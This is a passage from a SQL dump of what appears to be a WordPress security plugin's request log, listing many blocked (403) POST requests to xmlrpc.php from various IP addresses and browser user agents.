NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','zkVfeYvLS5cl0PAgRXQpntuo',0,1681262925.9180,559,'','POST',403,0,515,0,1,'',0),('175.41.217.33',2938755361,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','xVg3Glpw8k9uJFeER71d6qHS',0,1681262929.1866,609,'','POST',403,0,515,0,1,'',0),('35.156.214.100',597481060,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','4REzKBVkh7SIG62LDJ01asCe',0,1681265600.2581,1591,'','POST',403,0,515,0,1,'',0),('45.195.56.33',767768609,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','jpDSRKsoEzcqg47ihJ9TGu5N',0,1681265598.1726,4000,'','POST',403,0,515,0,1,'',0),('149.129.34.43',2508268075,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','rOAmyYJvnjtx0acS1GDPBlgC',0,1681266899.6747,1448,'','POST',403,0,515,0,1,'',0),('192.64.117.87',3225449815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','NduvbVPzjAalg09i6MYrTE8e',0,1681266907.3202,741,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','5yaIjdpetzEiCq3BoRrvKskP',0,1681266907.9875,674,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','X1Zr43EPcm6xn7WhCzvefBGw',0,1681266910.2084,562,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','uj0LtyYlGk7dR2a3onVWIvrE',0,1681266921.7837,561,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','N3frgHxaFzQT2yh1sUvSwDK7',0,1681266928.2640,557,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','pL8uf07hxBeGaXV9SOYmq1Tl',0,1681266929.4590,544,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','rSCgZtfaNRJeQynBkG6KhHjU',0,1681266937.7586,585,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','Vaj9bDmutxEsJNAUO03CvIpQ',0,1681266948.4431,1349,'','POST',403,0,515,0,1,'',0),('46.101.42.88',778381912,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','hc5gOmqVEry0UxzQjbaCINWY',0,1681268890.7661,1820,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','jVKhTuLGC9SpRqrOvEnFeZJ1',0,1681271874.3153,568,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','al4es9fNPrjZgOJKX5TIn8wc',0,1681271878.4918,632,'','POST',403,0,515,0,1,'',0),('5.231.78.38',99044902,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','qVRHf3T5wkpOGoP6EIvb04F1',0,1681273924.9388,4030,'','POST',403,0,515,0,1,'',0),('51.254.221.76',872340812,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','EXHSRvw3QNTBmJPDW8tLxFG2',0,1681273927.9753,1417,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','uJDsgIFfeVYZiyprk4tAoCq7',0,1681273929.8801,570,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','Rpi5Y9ewV3GDFmrso4SXtjbv',0,1681273931.7025,546,'','POST',403,0,515,0,1,'',0),('188.132.193.93',3162816861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','H0SachrsdDtYoyulX8Q3ngpC',0,1681273940.1847,562,'','POST',403,0,515,0,1,'',0),('15.206.123.128',265190272,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','J9hBtOu561Dj7AYrqHLskgGf',0,1681273949.3224,595,'','POST',403,0,515,0,1,'',0),('103.159.36.10',1738482698,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','GE6zMleRfaXno0pr12Kh8NFB',0,1681273952.4143,588,'','POST',403,0,515,0,1,'',0),('41.222.211.123',702468987,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','pPV5T0W1zx7uFnqQjgRBH4cO',0,1681273968.4778,596,'','POST',403,0,515,0,1,'',0),('67.227.204.35',1139002403,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','Th3bQGFr7LYvtAdzgl0sIyHO',0,1681273971.9838,625,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','FwLAxaHeY2OuZM4BdmVE03W9',0,1681273977.0903,565,'','POST',403,0,515,0,1,'',0),('198.251.70.49',3338356273,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','W6TnOUBvo4YkufVxLRHFlw7b',0,1681277267.0885,4756,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','s8Qq5ocHrOiE2h0MNpeSxIa1',0,1681277907.7918,539,'','POST',403,0,515,0,1,'',0),('68.178.224.4',1152573444,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','Bl04rGsTNIHWzMXtA3knboSe',0,1681277911.2182,548,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','WUJAVyhNeCBMfaoFzu43dI29',0,1681277912.2618,545,'','POST',403,0,515,0,1,'',0),('52.131.252.156',881065116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','SazdDPyfOZ85F3uKjvbsMLCJ',0,1681277918.1004,747,'','POST',403,0,515,0,1,'',0),('212.107.12.77',3563785293,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','t3HuIhaRobU1kDmMvpTjWO6x',0,1681277924.7448,616,'','POST',403,0,515,0,1,'',0),('103.121.90.183',1736006327,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','PHRoJ4ZiLfrhD18vtScTqayx',0,1681277925.9457,579,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','g4R3dWko72LluCGvIH5qYzmZ',0,1681277930.1247,719,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','5jQAwN3eUYgODfuEP2KXlmyF',0,1681277930.9488,585,'','POST',403,0,515,0,1,'',0),('128.204.199.227',2160904163,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','ICuglYm45JtLPoWhQRpx0DjT',0,1681278389.1401,4116,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','TFZ5NGmyVnwY6W1St9BCH4MX',0,1681278390.2705,2986,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','b4pRTl2gcSyDE7efFOQh03MG',0,1681278400.1346,607,'','POST',403,0,515,0,1,'',0),('54.36.172.75',908373067,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','W8jA1dviehJUa4CzHulOZYtc',0,1681278405.7715,546,'','POST',403,0,515,0,1,'',0),('194.149.144.86',3264581718,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','Y2hCAN3i1gptdRFUZG698xQl',0,1681278412.3563,630,'','POST',403,0,515,0,1,'',0),('144.24.39.81',2417502033,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','lIZArjhcX4USbikWfF8xDd10',0,1681278424.5161,563,'','POST',403,0,515,0,1,'',0),('45.140.185.41',764197161,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','VykRjYaqi0cKpAzvFHCsWefQ',0,1681278428.2687,724,'','POST',403,0,515,0,1,'',0),('130.185.75.142',2193181582,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','kwWy34N0bItsKMHCA2OofvUF',0,1681278436.5592,606,'','POST',403,0,515,0,1,'',0),('5.187.50.29',96154141,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','iy53VW7mSJnbAhj2aMEv1XwF',0,1681278450.6751,674,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','IkOHjiyTrLGVAWsPKR71Nu0v',0,1681278463.4129,604,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','yvCTFpxu7na3HLKkdjlEQSPt',0,1681282032.8321,1469,'','POST',403,0,515,0,1,'',0),('62.171.160.188',1051435196,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','IHkn6tjyX8fUG0rRugFK7xZ2',0,1681286112.8247,588,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','NgrI4dikhS8jaeCnfczMYJ9T',0,1681286389.5774,3549,'','POST',403,0,515,0,1,'',0),('95.216.93.102',1608015206,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','sVRgX0tN8i6Tuejpnz7SOca2',0,1681286395.3152,570,'','POST',403,0,515,0,1,'',0),('171.244.61.154',2884910490,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','OQbz8UsZurKipHXdA0cefWyq',0,1681290348.8371,1293,'','POST',403,0,515,0,1,'',0),('104.168.156.57',1755880505,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','qrLFyTRKPBm2EZNO0ke3IGSp',0,1681290352.8340,588,'','POST',403,0,515,0,1,'',0),('46.182.84.66',783701058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','JY4ZNgu1tdVBxULK2cQRIDGM',0,1681292891.1836,924,'','POST',403,0,515,0,1,'',0),('51.75.194.213',860603093,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','EYSQvZFl2OxLRn60uw8tVAIr',0,1681292898.8418,606,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','DpeAF7zy8Brlbmdas0fSojWk',0,1681292906.7904,668,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','PRn3T0CWN4IrFLXMgJy2Ghwp',0,1681292912.4575,649,'','POST',403,0,515,0,1,'',0),('128.204.199.227',2160904163,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VgQxXrTm8ERjFIGKJ0onOptu',0,1681292916.4062,621,'','POST',403,0,515,0,1,'',0),('185.177.153.205',3115424205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','0KQqH6tBXjwy4J9mFOacLVkn',0,1681292923.0955,584,'','POST',403,0,515,0,1,'',0),('5.188.34.69',96215621,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','nh3Ik2GC0TRyJd571iNFwmat',0,1681293672.6201,1820,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','ZgzRVe95APfLsmdGNSlk368C',0,1681293670.9291,3831,'','POST',403,0,515,0,1,'',0),('103.221.221.51',1742593331,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','hr7Hp5fvxVkLSb4M9KA612ZR',0,1681293732.9403,617,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','0SjdnPEO2qQahGt6JTozrFVf',0,1681293743.9082,627,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','7pOL5lxRWPc8h6k2njZeQDm9',0,1681293749.3913,548,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','grBzqZYleVSspxEWt5mQRHyD',0,1681293755.3844,671,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','m4rJR5wh2UKoxzNjFklXLfET',0,1681293894.3662,1564,'','POST',403,0,515,0,1,'',0),('62.109.13.15',1047334159,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','PV2DIibpMSrKWOh4TtwfxYyk',0,1681293896.3886,575,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','zD8HNkstox2MTEIicb6mBapO',0,1681293899.5674,595,'','POST',403,0,515,0,1,'',0),('194.0.200.15',3254831119,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','Uc67lMSd5R8IOzfkYFh4xiZs',0,1681293908.5385,614,'','POST',403,0,515,0,1,'',0),('51.79.228.91',860873819,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','kYrayXfLRDcopqsN7Wtng0IT',0,1681293911.9167,559,'','POST',403,0,515,0,1,'',0),('78.46.136.94',1311672414,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','Zdz8u4SCwIkXxMiUAWh7oas2',0,1681293916.8787,1391,'','POST',403,0,515,0,1,'',0),('134.209.95.37',2261868325,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','pBjnAd8YPRisauy7mDrOoCwJ',0,1681293917.2519,1217,'','POST',403,0,515,0,1,'',0),('182.50.132.78',3056763982,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','NK1eTACculIBsdPq63HJED7b',0,1681293927.5372,586,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','rqab4oK5fCwGeA9PEFxkT87y',0,1681296507.4217,768,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','2uesE6prZPUqj3aNXlYIKbyw',0,1681296509.7418,585,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','68orUxchDMHO3PG5qCVQyLte',0,1681296514.6720,626,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','Q9Hg6WIbriCe3Jd5ZNmUa70q',0,1681296519.2050,607,'','POST',403,0,515,0,1,'',0),('157.90.169.39',2639964455,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','xNZhzBmlPAqKJHECMtj167dV',0,1681296520.7095,578,'','POST',403,0,515,0,1,'',0),('38.242.216.30',653449246,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','Kom82R9lLYA7gxUuHFn34tsa',0,1681296521.9696,569,'','POST',403,0,515,0,1,'',0),('104.152.110.52',1754820148,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','esTVPzZBbw1r4xoiUjDktKA3',0,1681296529.6216,580,'','POST',403,0,515,0,1,'',0),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','VBibn805MJLvxkUOEIhq3GAW',0,1681296534.3492,586,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','xNZjX3hGtw7Qsbop5yFDKV4a',0,1681296539.2995,561,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','qNRPzM9ETg62vS1usHdja07e',0,1681296544.6328,606,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','RvaoDn0Lqjwi7KmFrJZhz2IA',0,1681296547.4882,530,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','5RyXb47njDTAScrJB1kemGHg',0,1681306403.2405,570,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 